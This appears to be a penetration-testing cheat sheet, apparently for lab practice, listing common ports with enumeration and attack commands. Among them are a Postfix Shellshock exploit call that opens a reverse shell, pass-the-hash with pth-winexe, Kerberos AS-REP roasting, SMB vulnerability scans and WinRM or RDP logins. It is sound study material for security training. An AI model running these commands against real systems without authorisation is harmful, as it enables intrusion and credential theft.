HIFG_Ports

COMMON PORTS AND USES

PORTS / ASSOCIATED COMMANDS / TARGET PROTOCOL

Port / Commands / Target
21 FTP
Try anonymous logins
ftp [email protected]
25 SMTP
telnet 10.10.10.10 25
VRFY user
FINISH SESSION: Ctrl + ] / close
VULN SHELLSHOCK – need valid email address:
python2 postfix-shellshock-nc.py 10.10.10.10 [email protected] LHOST LPORT
110 POP
143 IMAP
587 SECURE EMAIL
80 / 443 WEB
Dirb / Dirbuster / Gobuster / Nikto / Curl
RFI / LFI / SQLI
88 / 464 KERBEROS
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
111 NFS
showmount -a / -e
135 RPC
impacket-rpcdump
139 / 445 SMB
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
VERSIONS FOR ANALYSIS:
CIFS (OLD WINDOWS NT 4.0)
SMB 1.0 / SMB1 – WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2
SMB 2.0 / SMB2 – WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 – WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 – WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 – WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) – WIN SRV 2016 / WIN 10
1433 MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
3306 MYSQL
mysql -u <user> -p<pass>
show databases;
show tables;
389 / 3268 LDAP
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
3389 RDP
rdesktop -u <user> -p <pass> <host>
5985 / 5986 WINRM
evil-winrm -u <user> -p <pass> -i <host>